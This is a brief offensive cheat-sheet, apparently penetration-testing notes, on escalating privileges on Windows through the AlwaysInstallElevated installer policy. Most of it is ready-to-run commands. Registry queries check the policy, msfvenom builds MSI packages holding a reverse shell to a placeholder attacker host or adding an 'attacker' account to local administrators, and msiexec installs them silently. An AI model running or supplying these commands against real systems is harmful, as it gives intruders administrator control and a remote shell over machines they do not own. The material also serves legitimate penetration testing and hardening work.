- Windows installer files (also known as `.msi` files) are used to install applications on the system. **They usually run with the privilege level of the user that starts it**. - However, these can be configured to run with higher privileges from any user account. - This could potentially allows us to generate a malicious msi files that would run with admin privileges. This method requires two registry values to be set to `1`. - If both values are not set, exploitation will not be possible. - If these are set you can generate a malicious `.msi` files using `msfvenom` ```powershell # CMD reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated # PowerShell Get-ItemProperty -Path "HKCU:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated ``` ```powershell msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o malicious.msi msfvenom -p windows/exec CMD="net localgroup administrators attacker /add" -f msi -o evil.msi ``` ```powershell msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi runas /u:<user> "msiexec /quiet /qn /i C:\<PATH>\malicious.msi" ```